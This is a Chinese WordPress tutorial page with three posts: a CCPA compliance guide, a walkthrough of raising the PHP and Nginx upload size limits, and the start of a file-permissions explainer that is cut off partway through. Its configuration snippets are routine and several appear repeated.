分类: 学习

  • 您需要知道WordPress CCPA合规性的一切

    您需要知道WordPress CCPA合规性的一切

    确切地说,新的隐私法已于2020年1月1日生效,每个人都在争先恐后地实施合规。听起来有点熟?如果您感到似曾相识,请不要担心,我们也记得GDPR

    虽然GDPR是保护欧盟公民隐私权的总体法律,但这项新法律关注的是加利福尼亚州居民的隐私权。请允许我们向您介绍2018年加州消费者保护法 (CCPA),该法律旨在为加州人提供对其个人信息的更多控制权。

    在本指南中,我们将引导您完成以下操作:

    请注意,本指南仅供参考,不应被视为法律建议。

    什么是CCPA?

    CCPA是一项隐私法,于2018年6月28日通过。该法律的一个版本最初是作为房地产开发商2017年11月全州投票的一项倡议而引入的。开发商向加州立法机构提出了一项协议,即如果通过类似的隐私法,他将撤回他的选票(这对企业来说相当苛刻)。

    立法机关在总共7天内介绍、修改并通过了他们的CCPA版本。此后,该法律又被修改了几次,加州总检察长也发布了旨在澄清这项新法律要求的法规。您可以在此处找到CCPA的全文,以及通过的修正案,以及在此处提出的法规。

    根据立法者的说法,CCPA获得通过是因为:

    1. 技术的发展限制了加州人适当保护和维护其隐私的能力
    2. 加利福尼亚州的法律没有跟上消费者与企业分享越来越多的个人信息这一事实的步伐
    3. 未经授权的个人信息披露和隐私的丧失可能对人们造成毁灭性的影响
    4. Cambridge Analytica丑闻增加了对隐私控制和数据实践透明度的渴望。

    最后,很明显,人们渴望隐私和对自己信息的更多控制,而CCPA的通过就是为了满足这种愿望。与GDPR类似,CCPA通过向消费者提供某些权利来满足这一愿望,在这种情况下,向加利福尼亚居民提供某些权利。这些权利如下:

    1. 知道正在收集关于他们的哪些个人信息的权利
    2. 知道他们的个人信息是否被出售或披露以及向谁披露的权利
    3. 拒绝出售其个人信息的权利
    4. 要求删除其个人信息的权利
    5. 访问其个人信息的权利
    6. 平等服务和价格的权利,即使他们行使其隐私权

    CCPA适用于谁?

    隐私法中棘手的,有时也是最令人困惑的部分是弄清楚它们是否适用于您的业务。制定隐私法是为了保护特定州或国家的居民或公民的个人信息,而不是企业。

    这意味着加州以外的企业可能仍需遵守该法律。CCPA适用于“企业”,该企业被定义为在加利福尼亚州开展业务并满足以下门槛之一的营利性法律实体:

    1. 年总收入超过25,000,000美元
    2. 每年出于商业或商业目的购买或接收、出售或共享50,000名或更多加利福尼亚消费者、家庭或设备的个人信息或
    3. 其50%或更多的年收入来自出售加州消费者的个人信息。

    如果您认为CCPA在技术上仅适用于大公司,那您是部分正确的。由于个人信息销售的定义非常广泛,CCPA合规性的很大一部分是供应商的管理

    这意味着,如果您与大型企业开展业务或充当其供应商,他们可能会要求您通过合同遵守CCPA 。所以,如果你是一家不符合上述门槛的小公司,你可能还是需要注意并遵守这些要求。

    此外,如果您为需要遵守CCPA的大型公司设计网站,则需要注意,该法律将影响您设计这些网站的方式。

    不遵守CCPA的后果是什么?

    CCPA通常由加州总检察长执行。违规罚款为每次违规2,500美元或每次故意违规罚款7,500美元。“每次违规”通常被理解为是指您侵犯了其隐私权的每个人。

    因此,如果您有100名来自加利福尼亚的网站访问者并且没有合规的隐私政策,您的罚款可能高达250,000美元。很容易看出这是如何膨胀成一个非常大的数字。

    如果您必须仅通过合同遵守CCPA,则不遵守的后果可能是失去该客户或业务关系。如果您必须建立一个符合CCPA的网站,不合规的后果可能意味着您的客户会被罚款,您会被起诉作为回报或差评,从而损害您的网页设计业务。

    如何为CCPA准备WordPress网站

    如果您的WordPress网站需要符合CCPA,我们将引导您完成一些可以采取的步骤,以确保您符合CCPA。您为CCPA做准备的步骤可能包括:

    如果这一切看起来像很多工作,那就是。不过不用担心,我们还会为您提供一些我们最喜欢的工具和资源,您可以使用它们来帮助您做好准备。

    聘请隐私律师

    您很快就会看到,遵守CCPA有很多内容。至少可以说,法律和法规可能难以解释。

    如果您不确定自己的正确道路,您应该聘请一位专门研究隐私的律师,因为他们能够为您指明正确的方向,并针对您的具体情况为您提供有价值的建议。

    如果您不确定该选择哪位律师,请查看国际隐私专业人员协会 在隐私领域工作的律师事务所名单

    了解您收集的个人信息

    CCPA要求您告诉消费者您收集的个人信息类别。您应该浏览您的网站并创建一个列表。

    查看您的所有页面和您使用的所有表格,包括联系表格、订阅注册表单、帐户创建表格、评论提交表格、结帐表格以及您可能使用的任何其他表格及其相关联插件。

    例如,如下所示,WordPress中用于提供博客文章评论的默认表单收集姓名和电子邮件:

    评论表示例

    评论表示例

    此外,将您从任何其他来源收集的个人信息列表放在一起。想想分析软件、Hotjar、电子商务结账页面或WordPress注册页面上的信息,以及类似的。

    然后,将您从这些表格中收集的个人信息分类,以便消费者轻松了解您收集的个人信息。个人信息类别的示例包括:

    1. 识别信息
    2. 财务信息
    3. 商业信息
    4. 生物特征信息
    5. 互联网活动信息和
    6. 地理位置信息

    了解您从哪些来源收集这些个人信息

    CCPA要求您披露您从哪些来源收集个人信息。来源示例包括:

    1. 直接来自消费者
    2. 调查
    3. 跟踪像素
    4. 观察和记录活动,例如通过使用cookie和
    5. 数据经销商

    了解您是否向第三方披露个人信息

    CCPA要求您披露您是否向第三方披露个人信息。当被问及他们是否共享数据时,大多数人最初的回答是略带冒犯的“不”。

    花一些时间,真正考虑一下您与您的网站进行了哪些集成。

    通讯订阅是否直接使用MailChimp等电子邮件营销工具?

    表单提交是否会登录到HubSpot 等客户关系管理工具?

    每当您收到表单提交时,您的Web开发人员是否会收到警报?

    如果是这样,您正在与第三方共享数据,您需要披露该数据。

    创建一个不要出售我的个人信息页面

    如果您出售加州消费者的个人信息,您需要有一个标题为“请勿出售我的个人信息”或“请勿出售我的信息”的网页。此网页需要包含以下信息:

    1. 描述消费者选择不出售其个人信息的权利
    2. 消费者可以提交退出请求的网络表单
    3. 消费者可以提交退出请求的任何其他方法的说明
    4. 指向您的隐私政策的链接
    5. 消费者想要指定授权代理人代表他们提交退出请求时所需的任何证明

    下面,您可以看到一个网站主页页脚示例,其中包含指向“请勿出售我的个人信息”页面的超链接。

    “请勿出售我的个人信息”页面示例

    “请勿出售我的个人信息”页面示例

    创建隐私声明

    CCPA要求您在收集个人信息时向加州消费者提供隐私声明。

    请注意,CCPA不要求消费者同意收集个人信息,这与我们在GDPR中看到的要求大相径庭。

    隐私声明就像一个迷你隐私政策:它提供了关于收集哪些个人信息、将用于什么以及其他披露的快速而简明的解释。

    通知必须以易于阅读的方式设计并呈现给消费者,并且必须为普通人所理解。该通知必须:

    1. 使用简单明了的语言,避免使用技术或法律术语
    2. 使用能够吸引消费者注意通知并使通知可读的格式,包括在较小的屏幕上
    3. 以您向消费者提供合同、免责声明、销售公告或其他信息时使用的语言提供
    4. 残障消费者可以使用

    您的隐私声明必须包含以下信息:

    1. 您从消费者那里收集的个人信息类别列表。您列出的每个类别都必须让消费者对所收集的个人信息有一个有意义的了解
    2. 对于每一类信息,其将用于的商业或商业目的
    3. 如果您出售个人信息,标题为“请勿出售我的个人信息”或“请勿出售我的信息”的链接。此链接应指向一个网页,消费者可以在该网页上行使拒绝出售个人信息的权利

    如果您不想创建隐私声明,您只需在收集个人信息时向消费者提供指向您的隐私政策的链接。以下是加州特定隐私声明的示例。

    加利福尼亚特定的隐私声明

    加利福尼亚特定的隐私声明

    创建隐私政策

    CCPA还要求您制定隐私政策。隐私政策的目的是向消费者提供关于您收集、使用、披露和销售个人信息的做法以及消费者根据CCPA获得的隐私权的完整描述。

    隐私政策必须满足与隐私声明相同的可读性、格式、可用性和可访问性要求。

    但是,隐私政策还必须以允许消费者轻松打印出来的其他格式提供。隐私政策必须通过在您网站主页上使用“隐私”一词的显眼链接发布在您的网站上。

    您的隐私政策必须包含以下信息:

    1. 根据CCPA对加州消费者权利的描述
    2. 消费者可以提交行使权利的请求的一种或多种方法。如果您出售个人信息,请提供指向您的“请勿出售我的个人信息”或“请勿出售我的信息”页面的链接,消费者可以在其中行使拒绝出售其个人信息的权利
    3. 您在过去12个月内收集的个人信息类别列表
    4. 您收集个人信息的来源类别列表
    5. 您使用个人信息的商业或商业目的
    6. 您在过去12个月内出售的个人信息类别列表以及您向其出售该个人信息的第三方类别列表。如果您没有出售任何个人信息,那么您必须披露该事实
    7. 您在过去12个月内披露的个人信息类别列表以及您向其披露此个人信息的第三方类别列表。如果您没有披露任何个人信息,那么您必须披露该事实
    8. 消费者如何指定授权代理人代表他们提出行使隐私权的请求;
    9. 消费者可以联系到的任何问题或疑虑的联系人
    10. 隐私政策的最后更新日期
    11. 如果您每年出售4,000,000或更多加州消费者的个人信息,您还需要包括额外的披露

    可以帮助您遵守CCPA的工具和资源

    所有这些合规性和披露要求似乎都令人生畏。幸运的是,您可以使用很多有用的工具来为您的网站和业务做好准备:

    Termageddon

    Termageddon

    Termageddon

    Termageddon:一种软件即服务,可生成为您的业务定制的隐私政策。每当法律发生变化时,我们都会更新客户的隐私政策,以确保您的政策始终保持最新。

    CCPA Toll Free

    CCPA Toll Free

    CCPA Toll Free

    CCPA Toll Free:CCPA要求一些企业提供免费电话号码,作为消费者行使隐私权的方法之一。CCPA免费电话可帮助您满足该要求。

    Orrick’s CCPA Readiness Assessment

    Orrick's CCPA Readiness Assessment

    Orrick’s CCPA Readiness Assessment

    Orrick’s CCPA Readiness Assessment:该工具通过询问您简单的“是”或“否”问题,帮助您了解您为CCPA准备的充分程度。您还可以将此工具用作一种准备清单。

    CCPA Opt-Out by CookiePro

    您需要知道WordPress CCPA合规性的一切-1

    CCPA Opt-Out by CookiePro插件

    CCPA Opt-Out:此插件允许您自定义并向您的网站添加“不销售按钮”。

    IAPP

    IAPP

    IAPP

    IAPP:国际隐私专家协会是世界上最大的隐私组织。查看他们的网站,了解不断更新的隐私新闻、资源和供应商列表。

    小结

    虽然CCPA没有GDPR那样广泛的应用,但它仍然是一个非常重要的问题,不应掉以轻心。

    CCPA在美国确实是首创,其他州现在都在效仿加利福尼亚。事实上,截至2019年底,已有九个州提出了自己的隐私法案。

    这些法案要么引用CCPA作为灵感,要么实际上是CCPA的完整副本。很明显,CCPA为更多隐私法规铺平了道路,并且在线隐私合规要求不会很快消失。

  • 如何修改WordPress最大上传文件大小限制

    修改WordPress最大上传限制

    较低的WordPress上传限制可阻止您上传大文件,插件和主题。如果您要建立一个拥有大量多媒体资源的网站,那这将是一个很大的障碍。在这种情况下,有必要增加WordPress或服务器(或两者)中的最大上传大小。

    也经常在WordPress交流群里看到站长咨询关于WordPress上传文件大小限制的问题,因此,我们有必要针对WordPress上传大小限制话题撰写一篇文章,以解众惑。

    根据不同的服务器托管提供商和服务器,有很多方法可以解决此问题。我们将在本教程中尽可能全面地介绍设置WordPress最大上传大小限制。

    1. WordPress最大上传限制是多少?
    2. 如何检查WordPress当前最大上传限制
    3. 为什么要增加WordPress最大上传限制?
    4. 增加WordPress最大上传限制的10种方法
    5. 不要编辑 “wp-config.php” 文件
    6. 验证WordPress网站新的最大上传限制

    WordPress最大上传限制是多少?

    将大文件上传到服务器会消耗大量服务器资源。为了防止用户因上传文件造成服务器超时,WordPress默认的最大上传大小通常为4 MB128 MB。通常,服务器托管提供商或者服务器软件在服务器级别设置此限制。

    WordPress还包含定义此限制的常量,但在大多数情况下它们不能覆盖服务器级别的设置。

    服务器默认最大上传文件大小,不同的服务器提供商有不同的设置,一般不会超过128MB。

    要验证这一点,请转到WordPress网站的“媒体库”。在这里,尝试上传超出此最大上传文件大小限制的文件。您会看到一条类似以下内容的错误消息:

    WordPress最大上传限制

    在WordPress中上传大文件时出错

    “超过了站点的最大上传限制”主要有两个原因:安全性和效率。这会阻止站点所有者和其他用户(包括恶意行为者)上传大文件(例如,高分辨率图像,大视频)。

    否则,可能导致网站服务器无法使用,从而使网站无法正常运行。更糟糕的是,它可能会使网站彻底瘫痪!

    如何检查WordPress当前的最大上传限制

    有很多方法可以检查您的WordPress网站当前的最大上传限制,具体如下。

    在媒体库中

    检查网站当前最大上传限制的最便捷的方法是转到WordPress仪表盘,然后从此处转到媒体>媒体库。点击添加新文件按钮以启用媒体上传工具。

    WordPress最大上传文件大小

    WordPress最大上传文件大小

    国外部分服务器托管站点时,最大上传文件大小消息将显示在“选择文件”按钮下方。如果您使用其他网络托管服务提供商,则可能会在此处看到其他限制。

    您也可以直接转到媒体>添加新内容,并在底部看到相同的消息。

    WordPress媒体库最大上传文件大小

    WordPress媒体库中的“最大上传文件大小”

    同样,您可以在此处看到最大128 MB的上传文件大小。

    在站点健康信息中

    WordPress 5.2添加了Site Health Info工具,以帮助您更好地调试WordPress网站。在这里,您几乎可以找到有关服务器和WordPress配置的所有信息。

    由于服务器和WordPress都设置最大上传文件大小,在此界面上有两种方法可以找到最大上传文件大小值。

    首先,您可以在“媒体处理”下拉列表中找到“最大单一上传文件大小”的值。

    站点健康信息面板媒体处理设置

    “站点健康”信息面板中的媒体处理设置

    第二种方法是在“服务器”下拉列表可以看到与您的网站服务器设置相关的信息。找到“上传最大文件大小”的对应值,即你的WordPress的最大上传限制。下面截图的演示站点的最大上传文件大小限制为128 MB

    “站点健康”信息面板中的服务器设置

    “站点健康”信息面板中的服务器设置

    您还可以查看其他PHP常量及其值,例如:

    • PHP post max size定义POST请求的最大上传限制。
    • PHP memory limit定义为PHP分配的内存。应将其设置为等于或大于最大上传限制。否则,上传将失败。

    一般情况下配置越低的虚拟主机,这些选项所设置的值越小。这也是为什么小编常常建议站长尽可能选购VPS作为WordPress网站的服务器,因为允许站长自行配置这些选项的值。

    为什么增加WordPress最大上传限制?

    有许多原因可能导致您需要增加WordPress网站的最大上传文件大小,最常见的原因有:

    • 通过WordPress管理仪表盘安装大型主题或插件。
    • 定期更新WordPress网站内容以保持读者参与度并获得更多回报。这包括定期上传新图像,视频,音频和其他媒体。但是,当您的上传文件有大小限制时,这并不总是可行的。
    • 上传大型视频或图像作为网站的背景或Header。
    • 直接从站点出售数字文件,例如电子书,照片,视频,主题和插件。有时,这些文件高达数百兆字节(或更多)。

    上面我们了解了WordPress最大上传文件大小的基础知识,下面让我们一起深入了解如何修改最大上传限制值。

    增加WordPress最大上传文件大小的10种方法

    我们可以通过多种方法来解决WordPress的最大上传大小问题,下面十种方法将由浅及深,或者由简单到复杂排列。

    1. 联系服务器托管提供商以获取帮助
    2. 在WordPress多站点中增加最大上传文件大小
    3. 更新 “.htaccess” 文件
    4. 创建或修改 “php.ini” 文件
    5. 创建或修改 “.user.ini” 文件
    6. 通过cPanel更改PHP选项
    7. 在Nginx中增加最大上传文件大小
    8. 使用WordPress的 “upload_size_limit” 过滤器
    9. 使用WordPress插件
    10. 通过FTP/SFTP上传文件

    联系服务器托管提供商以获取帮助

    如果您在上传文件文件大小限制方面遇到问题,请联系服务器托管提供商以寻求帮助,这是最快的解决方案之一。增加上传限制是一项技术支持的琐碎任务,因此大多数托管公司可以帮助您快速解决此问题。

    修改服务器或站点配置文件对于不熟悉服务器配置的人们来说始终是一项艰巨的任务。因此,我们建议您首先尝试此方法。

    注:一般虚拟主机,如需要修改WordPress最大上传限制值,可能甚至必须通过联系服务器提供商技术客服来修改。

    在WordPress多站点中增加最大上传文件大小

    如果您正在运行WordPress Multisite网络,则可以修改网络的最大上传文件大小。

    首先,转到“网络管理”仪表板,然后转到“设置”>“网络设置”屏幕。在此处向下滚动,直到找到“上传设置”部分,您将会找到 Max upload file size 字段。

    “网络设置”中的“最大上传文件大小”字段

    “网络设置”中的“最大上传文件大小”字段

    WordPress Multisite中的最大上传文件大小的默认值为1500 KB(〜1.5 MB)。您可以将其更改为更高的值,然后单击“保存更改”按钮。

    注:您不能从此处规避服务器级别的最大上传大小限制。如果您在此处设置的限制高于服务器的最大上传大小限制,则服务器将忽略它。您可以使用上述方法来查找Web服务器的配置。

    “网络设置”中新的“最大上传文件大小”

    “网络设置”中新的“最大上传文件大小”

    本次演示,我们将新的最大上传文件大小设置为131072 KB〜128 MB)。

    您还可以限制上传到多站点网络中单个站点的文件的总大小。一般默认情况下它是禁用的。

    更新 “.htaccess” 文件

    如果您的网站服务器在Apache上运行,则可以更新站点的.htaccess文件以增加WordPress最大上传大小。您可以在WordPress网站的根目录中找到.htaccess文件。

    根据PHP文档,三个PHP指令负责WordPress处理上传的方式,分别是:

    • upload_max_filesize
    • post_max_size
    • memory_limit

    在上面的“站点健康信息”部分中讨论了它们。如果您修改了这三个指令的值以接纳您的文件大小,将会有所帮助。例如,如果您计划上传的最大文件是32 MB,我们建议您进行以下设置:

    • upload_max_filesize = 32M
    • post_max_size = 64M
    • memory_limit = 128M

    注意,所有值都使用M而不是MB。这就是PHP处理其指令的方式。

    上传文件除了文件本身之外,还可以包含其他信息。因此,为所有其他与上传相关的指令提供一些预留的空间是个好主意。您可以阅读“如何解决WordPress内存限制错误(2种方法)”教程,获取更多信息。

    通过FTP/SFTP或服务器提供商的文件管理器访问.htaccess文件。

    如何修改WordPress最大上传文件大小限制-1

    查找“ .htaccess”文件

    使用文本编辑器或代码编辑器打开 .htaccess文件,然后添加以下代码:

    php_value upload_max_filesize 32M
    php_value post_max_size 64M
    php_value memory_limit 128M
    php_value max_execution_time 300
    php_value max_input_time 300
    php_value upload_max_filesize 32M
    php_value post_max_size 64M
    php_value memory_limit 128M
    php_value max_execution_time 300
    php_value max_input_time 300
    php_value upload_max_filesize 32M 
    php_value post_max_size 64M 
    php_value memory_limit 128M 
    php_value max_execution_time 300 
    php_value max_input_time 300

    您可以在上面的代码中注意到另外两个PHP指令:max_execution_timemax_input_time。它们定义服务器在一个PHP任务上花费的时间。您上传的内容越大,花费的时间就越大。您需要将它们的值设置为适合您的用例的数字。

    注:使用上述方法后,您可能会收到500 Internal Server Error。这很可能是因为您的服务器正在CGI模式下运行PHP。在这种情况下,您不能在.htaccess文件中使用以上命令。

    创建或修改 “php.ini” 文件

    php.ini文件中,您可以定义对默认PHP设置的更改。通常,它包含定义文件超时,最大上传大小和资源限制的指令。

    使用SSH或FTP,您可以在WordPress根目录中找到php.ini文件。在某些情况下,您可能无法在此处找到它。不用担心!您可以在站点的根目录中创建一个具有相同名称的新文件。

    创建一个新的php.ini文件

    创建一个新的php.ini文件

    使用代码或文本编辑器,将以下代码添加到现有或新的php.ini文件中:

    upload_max_filesize = 32M
    post_max_size = 64M
    memory_limit = 128M
    upload_max_filesize = 32M
    post_max_size = 64M
    memory_limit = 128M
    upload_max_filesize = 32M 
    post_max_size = 64M 
    memory_limit = 128M

    进行更改后,请不要忘记保存文件。某些主机不允许您通过此方法修改PHP设置。在这种情况下,您可以继续尝试以下解决方案。

    创建或修改 “.user.ini” 文件

    如果服务器托管服务提供商已锁定了全局PHP设置,则他们可能已将服务器配置为使用.user.ini文件而不是php.ini文件。

    php.ini.htaccess文件一样,您可以在网站的根目录中找到.user.ini。如果找不到,则可以在同一位置创建一个新的.user.ini文件。按照前面方法中描述的相同过程创建一个新的 php.ini文件。

    接下来,将以下代码添加到您的.user.ini文件中:

    upload_max_filesize = 32M
    post_max_size = 64M
    memory_limit = 128M
    upload_max_filesize = 32M
    post_max_size = 64M
    memory_limit = 128M
    upload_max_filesize = 32M 
    post_max_size = 64M 
    memory_limit = 128M

    有没有发现,这只是重复了前面的方法,只是文件名不同。

    通过cPanel更改PHP选项

    如果服务器托管提供商使用cPanel控制面板来帮助您管理服务器和站点配置,则可以通过其界面更改最大上传文件的大小。

    首先,请转到cPanel仪表盘,然后在“Software部分下选择“Select PHP Version” 。

    cPanel仪表盘-“选择PHP版本”

    cPanel仪表盘-“选择PHP版本”

    在这里,您可以更改服务器当前PHP版本并启用/禁用许多PHP扩展。单击导航菜单中的“Options链接以转到“PHP Options面板。

    转到cPanel中的“ PHP Options”设置

    转到cPanel中的“ PHP Options”设置

    向下滚动这里修改PHP指令,如值upload_max_filesizepost_max_sizememory_limitmax_execution_time,和max_input_time,您可以在此处可设置的最大值取决于您当前的服务器配置。

    cPanel中的“ PHP选项”

    cPanel中的“ PHP选项”

    如果您对这些值有任何疑问,建议您与托管服务提供商联系。最新的cPanel仪表盘会自动保存更改。但是,如果您使用的是较早的cPanel版本,请确保点击保存按钮以保存更改。

    在Nginx中增加最大上传文件大小

    Nginx是另一个类似于Apache的网络服务器,但它还有很多其他功能。通常,Nginx可以比Apache处理更多的并发请求,从而使其更快。闪电博也是使用Nginx解决方案。

    如果您在Nginx上运行WordPress网站,则需要同时修改php.ininginx.conf文件。我们之前已经处理过前一个文件。后者称为Nginx配置文件。

    在Nginx服务器上,您可以在找到php.ini文件/etc/php/7.4/fpm/php.ini。根据您安装的PHP版本,路径可能会略有不同。

    upload_max_filesize = 64M
    post_max_size = 128M
    upload_max_filesize = 64M
    post_max_size = 128M
    upload_max_filesize = 64M 
    post_max_size = 128M

    您无需在上面的文件设置memory_limit,因为Nginx对它的处理方式有所不同。有关更多信息,您可以查看Stack Overflow这篇文章。保存php.ini文件后,去终端重新启动PHP-FPM,以启用更改:

    sudo service php7.4-fpm restart
    sudo service php7.4-fpm restart
    sudo service php7.4-fpm restart

    同样,重启PHP的指令代码可能会略有不同,具体取决于服务器上安装的PHP版本。

    接下来,使用Nginx的client_max_body_size指令设置新的最大上传大小限制。您需要在nginx.conf文件中声明此指令,您可以在/etc/nginx/nginx.conf找到该文件。

    您可以在http {...}块,server {...}块或location {...}块中声明此指令。

    http块中进行设置会影响此服务器上托管的所有网站/应用。

    http {
    client_max_body_size 128M;
    }
    http {

    client_max_body_size 128M;
    }
    http { 
    ... 
    client_max_body_size 128M; 
    }

    server块中定义它只会影响此服务器托管的特定站点/应用程序。

    server {
    client_max_body_size 128M;
    }
    server {

    client_max_body_size 128M;
    }
    server { 
    ... 
    client_max_body_size 128M; 
    }

    location块定义则仅影响指定的目录(如文件上传目录)。

    location /files {
    client_max_body_size 128M;
    }
    location /files {

    client_max_body_size 128M;
    }
    location /files { 
    ... 
    client_max_body_size 128M; 
    }

    不要忘记保存文件并重新启动Nginx以应用更改,您可以在终端中使用以下命令重启NG:

    sudo service nginx reload
    sudo service nginx reload
    sudo service nginx reload

    部分服务器提供商不允许客户直接访问Nginx配置。但是,可以与支持团队联系更改。

    使用WordPress的 “upload_size_limit” 过滤器

    WordPress 2.5引入了upload_size_limit过滤器,该过滤器过滤php.ini中允许的最大上传大小。甚至WordPress都使用此过滤器来显示允许的最大上传大小,例如在“媒体库”和“站点健康信息”界面中。

    以下是WordPress贡献者Drew Jaynes实际使用的此过滤器的示例。它定义了所有非管理员角色的上传大小限制。

    /**
    * Filter the upload size limit for non-administrators.
    *
    * @param string $size Upload size limit (in bytes).
    * @return int (maybe) Filtered size limit.
    */
    function filter_site_upload_size_limit( $size ) {
    // Set the upload size limit to 10 MB for users lacking the ‘manage_options’ capability.
    if ( ! current_user_can( ‘manage_options’ ) ) {
    // 10 MB.
    $size = 1024 * 10000;
    }
    return $size;
    }
    add_filter( ‘upload_size_limit’, ‘filter_site_upload_size_limit’, 20 );
    /**
    * Filter the upload size limit for non-administrators.
    *
    * @param string $size Upload size limit (in bytes).
    * @return int (maybe) Filtered size limit.
    */
    function filter_site_upload_size_limit( $size ) {
    // Set the upload size limit to 10 MB for users lacking the ‘manage_options’ capability.
    if ( ! current_user_can( ‘manage_options’ ) ) {
    // 10 MB.
    $size = 1024 * 10000;
    }
    return $size;
    }
    add_filter( ‘upload_size_limit’, ‘filter_site_upload_size_limit’, 20 );
    /**
    * Filter the upload size limit for non-administrators.
    *
    * @param string $size Upload size limit (in bytes).
    * @return int (maybe) Filtered size limit.
    */
    function filter_site_upload_size_limit( $size ) {
    // Set the upload size limit to 10 MB for users lacking the 'manage_options' capability.
    if ( ! current_user_can( 'manage_options' ) ) {
    // 10 MB.
    $size = 1024 * 10000;
    }
    return $size;
    }
    add_filter( 'upload_size_limit', 'filter_site_upload_size_limit', 20 );

    上面的代码使用WordPress的 manage_options 功能仅针对非管理员设置此限制。您可以修改代码以定位特定的用户角色或用户ID。

    使用WordPress插件

    并非所有人都喜欢使用SSH或FTP/SFTP来处理代码。如果您不习惯编写或编辑代码,则可以改用WordPress插件。

    WP Maximum Upload File Size插件

    WP Maximum Upload File Size插件

    我们将在此处使用WP Maximum Upload File Size插件。撰写本文时,它是WordPress插件市场中唯一可帮助您完成此操作的最新插件。

    首先,请安装并启用WP Maximum Upload File Size插件。点击WordPress管理后台左侧菜单的“Wp upload limit”,在这里,您可以看到托管提供商和WordPress设置的最大上传文件大小。

    WP最大上传文件大小设置

    WP最大上传文件大小设置

    在这里,您可以看到WordPress设置的最大上传文件大小小于托管服务提供商设置的最大文件大小。因此,您可以通过选择最大上传文件大小并显示下拉菜单来设置更大的上传限制。

    注:如果您要设置的最大上传文件大小上限大于托管服务提供商设置的上限,则无法通过此插件进行操作。为此,您需要联系您的托管服务提供商。

    通过FTP/SFTP上传文件

    不想使用上述所有方法?您还可以通过FTP/SFTP上传大文件。

    使用SFTP上传文件到服务器

    使用SFTP上传文件到服务器

    如果要上传大量文件,这是最快的方法。

    有时,WordPress无法识别通过FTP/SFTP上传的文件。在这种情况下,您可以使用免费插件- Add From Server将上传的文件导入WordPress。

    或者,您可以通过使用WP-CLI导入图像,从命令行直接执行相同操作。wp media import命令允许您从本地文件或URL创建附件。

    不要编辑 “wp-config.php” 文件

    编辑wp-config.php文件不再起作用。之所以在这里提及它是因为我们发现许多网上教程都将其列为修改WordPress最大上传限制的合法方法。

    该方法是通过FTP/SFTP或SSH进入站点的根目录,然后编辑wp-config.php文件。

    查找wp-config.php文件

    查找wp-config.php文件

    建议您将以下代码添加到wp-config.php文件中:

    @ini_set( ‘upload_max_size’ , ’64M’ );
    @ini_set( ‘post_max_size’, ‘128M’);
    @ini_set( ‘memory_limit’, ‘256M’ );
    @ini_set( ‘upload_max_size’ , ’64M’ );
    @ini_set( ‘post_max_size’, ‘128M’);
    @ini_set( ‘memory_limit’, ‘256M’ );
    @ini_set( 'upload_max_size' , '64M' ); 
    @ini_set( 'post_max_size', '128M'); 
    @ini_set( 'memory_limit', '256M' );

    它无法工作,因为您只能使用 ini_set() function来设置属于PHP_INI_ALL可变模式的PHP指令。

    upload_max_sizepost_max_size作为属于PHP_INI_PERDIR多变的模式。您只能通过php.ini.htaccesshttp.conf.user.ini进行设置。

    如果您以前尝试过此方法而没有看到任何结果,那么现在您知道它为什么会失败。

    验证WordPress网站的新的最大上传限制

    最后,我们需要验证WordPress网站中是否实现了新的最大上传文件大小限制。为此,请按照上面讨论的相同步骤检查WordPress中的最大上传文件大小。

    转到WordPress信息中心中的媒体库,然后检查最大上传文件大小限制是否已更改。

    验证“媒体库”中新的最大上传文件大小

    验证“媒体库”中新的最大上传文件大小

    是的,它已经改变了。那是成功的!

    您也可以转到“站点健康”面板,然后在“媒体处理”和“服务器”下拉列表中检查是否相同。

    媒体处理最大上传文件大小

    在“站点健康信息>媒体库”中验证新的最大上传文件大小

    服务器最大上传文件大小

    在“站点运行>状况信息>服务器”中验证新的最大上传文件大小

    小结

    如您所见,在WordPress中修改最大上传限制并不是太复杂。无论您是要构建大量媒体作品集网站还是要安装大型主题,只需知道要在哪里查找以及要使用哪些命令或工具即可。

    在大多数情况下,与您的托管服务提供商联系就足够了。但是,如果您遇到麻烦的主机,我们将向您展示一些替代方法,您可以在迁移到更好的主机之前尝试一下。

    上述有没有涵盖了所有你所需要的内容吗?您是否也曾经遇到了上载文件大小限制的情况,然后你是如何处理的?留言与我们一起深入交流。

  • WordPress权限:了解它们以及其最佳设置

    WordPress权限:了解它们以及其最佳设置

    您是否试图找出文件和文件夹的正确WordPress权限?还是您首先对WordPress权限的整个概念感到困惑?

    WordPress文件权限对您网站的安全和运行至关重要,因此您必须了解它们。如果您使用的是WordPress托管,您的主机几乎可以肯定已经为您配置了一些东西,但是如果您遇到任何问题,理解这些概念仍然很有帮助。

    因此,无论您从未听说过文件权限,或者您只是在为WordPress寻找正确的文件权限,我们都会在这篇文章中为您介绍。如果您已经熟悉文件权限,可以单击第二个链接直接跳转到WordPress的最佳文件权限。

    1. 什么是文件权限?
    2. WordPress的正确文件权限
    3. 如何快速检查WordPress文件权限
    4. 如何编辑WordPress文件权限

    Tips:这篇文章100%专注于WordPress文件权限以及如何使用它们来保护您的网站。如果您对控制WordPress用户权限更感兴趣,请查看我们的WordPress用户角色和权限文章。

    什么是文件权限?

    简而言之,文件权限控制不同用户如何与您的WordPress站点服务器上的文件进行交互。更具体地说,文件权限控制谁可以读取写入执行文件:

    • 读取:读取文件内容的能力。
    • 写入:更改文件的能力。
    • 执行: “使用”文件的能力(例如执行脚本)。

    什么是用户?

    用户分为三种不同的“类型”:

    • 所有者:文件或目录的指定所有者。
    • 组:拥有文件或直接拥有文件的组的成员。
    • 公共:除文件所有者或组成员之外的所有用户。

    每个文件或文件夹都归特定用户或特定组所有。每个用户可以是多个组的成员,但他们只能拥有一个主要组。

    例如,当您通过SFTP连接到您的站点时,您正在使用服务器上的用户帐户,并且该用户帐户属于一个或多个组,具体取决于您的服务器的配置方式。

    注意:大多数人不需要掌握“用户”的概念,因为您的主机会为您配置所有这些。但是,了解了解文件权限的功能至关重要。如果您在本节中感到有些迷茫,请知道在大多数情况下,您的主机已经为您的服务器环境适当地设置了用户。

    通过文件权限,您可以控制每种类型的用户(所有者、组、公共)可以对服务器上的文件和文件夹执行的操作(读取、写入、执行)。

    一般来说,文件的所有者应该拥有最多的权限;属于同一组的用户将拥有相同或更少的权限;公共用户将拥有与组相同或更少的权限:

    所有者 > 组 > 公共

    文件权限的概念与WordPress角色和权限系统非常相似。如果您是网站的管理员,那么您拥有的控制权比编辑者更多。例如,管理员可以安装新插件,但编辑器不能。

    同样,编辑器比您网站的匿名访问者拥有更多的控制权,即使编辑器没有完全管理员的权力。例如,编辑器可以编辑其他人的博客文章并发布新的博客文章,但编辑器不能安装新插件。

    文件权限中的数字是什么意思?

    文件权限由称为权限模式的三位数字表示(例如777440)。

